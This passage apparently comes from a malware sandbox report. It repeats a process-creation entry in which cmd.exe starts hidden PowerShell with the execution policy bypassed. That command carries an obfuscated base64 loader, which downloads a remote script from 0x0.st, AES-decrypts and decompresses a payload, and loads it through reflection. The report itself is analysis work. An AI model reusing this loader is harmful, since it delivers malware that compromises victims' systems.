rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3J